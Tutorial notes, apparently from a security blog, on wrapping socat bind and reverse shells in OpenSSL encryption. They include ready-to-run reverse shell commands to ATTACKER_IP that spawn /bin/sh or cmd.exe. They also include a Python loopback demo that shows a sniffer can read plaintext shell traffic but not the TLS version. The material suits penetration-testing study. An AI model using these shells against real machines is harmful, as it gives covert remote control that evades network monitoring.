Encrypted Bind and Reverse Shells with Socat (Linux/Windows)
Encrypt your traffic with openssl when using bind or reverse shells.
by erev0s
June 20, 2020
https://erev0s.com/blog/encrypted-bind-and-reverse-shells-socat/
This article shows how to use socat to add OpenSSL encryption to bind and reverse shells, so that a sniffer on the path no longer sees the commands and their output in cleartext.
| Notes |
|---|
| swiss army knife |
| socat |
| netcat |
| encryption |
| bind shell |
| reverse shell |
| bind shell Linux: `socat -d -d TCP4-LISTEN:4444 EXEC:/bin/sh` |
| bind shell Windows: `socat -d -d TCP4-LISTEN:4444 EXEC:'cmd.exe',pipes` |
| bind shell client (from attacker machine): `socat - TCP4:IP_ADDR:4444` |
| IP address |
| TCP |
| IPv4 |
| Kali Linux |
| Wireshark |
| reverse shell listener (attacker machine): `socat -d -d TCP4-LISTEN:4444 STDOUT` |
| reverse shell Linux: `socat TCP4:IP_ADDRESS_OF_LISTENER:4444 EXEC:/bin/sh` |
| reverse shell Windows: `socat TCP4:IP_ADDRESS_OF_LISTENER:4444 EXEC:'cmd.exe',pipes` |
| sniffer |
| openssl |
| certificate |
| certificate key file: .key extension |
| certificate file: .crt extension |
| certificate PEM file (key and certificate concatenated): .pem extension |
| `openssl req -newkey rsa:2048 -nodes -keyout foo.key -x509 -days 1000 -subj '/CN=www.foo.com/O=Foo Company LTD./C=US' -out foo.crt` |
| `cat foo.key foo.crt > foo.pem` |
| bind shell w/ ssl Linux: `socat OPENSSL-LISTEN:4444,cert=foo.pem,verify=0,fork EXEC:/bin/sh` |
| bind shell w/ ssl Windows: `socat OPENSSL-LISTEN:4444,cert=foo.pem,verify=0,fork EXEC:'cmd.exe',pipes` |
| bind shell client: `socat - OPENSSL:IP_ADDRESS_OF_VICTIM:4444,verify=0` |
| socat `verify=0`: disables certificate verification, so the traffic is encrypted but the peer is not authenticated; anyone who can reach the port can connect, and an active attacker on the path can sit in the middle. To pin the listener's certificate, drop `verify=0` on the connecting side and verify against it with `cafile=foo.crt` (on socat 1.7.3 or later also add `commonname=www.foo.com`, since the certificate's CN does not match a bare IP address). |
| reverse shell listener (attacker machine): `socat -d -d OPENSSL-LISTEN:4444,cert=foo.pem,verify=0,fork STDOUT` |
| reverse shell Linux: `socat OPENSSL:ATTACKER_IP:4444,verify=0 EXEC:/bin/sh` |
| reverse shell Windows: `socat OPENSSL:ATTACKER_IP:4444,verify=0 EXEC:'cmd.exe',pipes` |
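The notes above say that Wireshark shows the commands of a plain TCP bind shell in cleartext and that the OpenSSL variant hides them, but they do not show it. The following is an added example, not code from the erev0s post: a small Python stand-in for `socat TCP4-LISTEN:4444 EXEC:/bin/sh` (one command per connection, no pty) that can also run as the `OPENSSL-LISTEN` variant, plus a forwarding "tap" socket that stands in for the sniffer and records every byte that crosses the wire. The client side connects the way `OPENSSL:host:port,verify=0` does (encrypted, peer not authenticated). It assumes the `openssl` CLI is on PATH and uses the same `openssl req -x509` command as the post to create the self-signed certificate; the socket layout, port choice (ephemeral loopback ports) and the `echo socat-test` command are constructed for the demo.

```python
# Plain vs. OpenSSL-wrapped bind shell, modelled in Python. Added example, not
# code from the erev0s post: a tiny server stands in for
# `socat TCP4-LISTEN:4444 EXEC:/bin/sh` (one command per connection, no pty) and
# a forwarding "tap" socket stands in for Wireshark. Assumes the `openssl` CLI
# is on PATH for the self-signed certificate (same command as the post).
import os, socket, ssl, subprocess, tempfile, threading

socket.setdefaulttimeout(10)  # a stuck socket fails the demo instead of hanging


def make_cert(directory):
    """Self-signed cert + key via the post's `openssl req -x509` command."""
    key, crt = os.path.join(directory, "foo.key"), os.path.join(directory, "foo.crt")
    subprocess.run(["openssl", "req", "-newkey", "rsa:2048", "-nodes", "-keyout", key,
                    "-x509", "-days", "1", "-out", crt,
                    "-subj", "/CN=www.foo.com/O=Foo Company LTD./C=US"],
                   check=True, capture_output=True)
    return crt, key


def bind_shell(listener, server_ctx):
    """Accept one client, run one line via /bin/sh, send its stdout back.
    server_ctx=None is the TCP4-LISTEN case; an SSLContext is OPENSSL-LISTEN."""
    conn, _ = listener.accept()
    if server_ctx is not None:
        conn = server_ctx.wrap_socket(conn, server_side=True)
    line = b""
    while not line.endswith(b"\n"):
        chunk = conn.recv(4096)
        if not chunk:
            break
        line += chunk
    conn.sendall(subprocess.run(line.decode(), shell=True, capture_output=True).stdout)
    conn.close()


def tap(listener, target, captured):
    """Relay one connection to `target`, copying every byte into `captured`."""
    client, _ = listener.accept()
    upstream = socket.create_connection(target)

    def pump(src, dst):
        while True:
            data = src.recv(4096)
            if not data:
                break
            captured.extend(data)  # exactly what a sniffer on the path sees
            dst.sendall(data)
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

    worker = threading.Thread(target=pump, args=(client, upstream))
    worker.start()
    pump(upstream, client)
    worker.join()
    client.close()
    upstream.close()


def run_shell(command, cert=None, key=None):
    """Send `command` through the tap to the bind shell; return (output, wire bytes).
    With cert/key the server is TLS and the client acts like OPENSSL:...,verify=0."""
    srv, tp = socket.socket(), socket.socket()
    for s in (srv, tp):
        s.bind(("127.0.0.1", 0))
        s.listen(1)
    server_ctx = None
    if cert:
        server_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        server_ctx.load_cert_chain(cert, key)
    captured = bytearray()
    threads = [threading.Thread(target=bind_shell, args=(srv, server_ctx)),
               threading.Thread(target=tap, args=(tp, srv.getsockname(), captured))]
    for t in threads:
        t.start()
    sock = socket.create_connection(tp.getsockname())
    if cert:
        client_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        client_ctx.check_hostname = False  # verify=0: encrypted, peer not authenticated
        client_ctx.verify_mode = ssl.CERT_NONE
        sock = client_ctx.wrap_socket(sock)
    sock.sendall(command.encode() + b"\n")
    output = b""
    while chunk := sock.recv(4096):
        output += chunk
    sock.close()
    for t in threads:
        t.join()
    srv.close()
    tp.close()
    return output.decode(), bytes(captured)


def demo(command="echo socat-test"):
    """Run the same command over plain TCP and over TLS; report what leaked."""
    with tempfile.TemporaryDirectory() as d:
        crt, key = make_cert(d)
        plain_out, plain_wire = run_shell(command)
        tls_out, tls_wire = run_shell(command, crt, key)
    return {"plain_output": plain_out, "tls_output": tls_out,
            "plain_leaks_command": command.encode() in plain_wire,
            "tls_leaks_command": command.encode() in tls_wire}
```

Both runs return the same command output, but only the plain TCP run has the literal command (and its output) in the captured wire bytes; the TLS run shows only the handshake and encrypted records, which is what the Wireshark comparison in the notes is about. The client deliberately mirrors `verify=0` (`CERT_NONE`, no hostname check): it proves confidentiality against a passive sniffer, not authenticity, so swapping in `CERT_REQUIRED` with `load_verify_locations("foo.crt")` is the Python equivalent of the `cafile=` pinning mentioned in the notes.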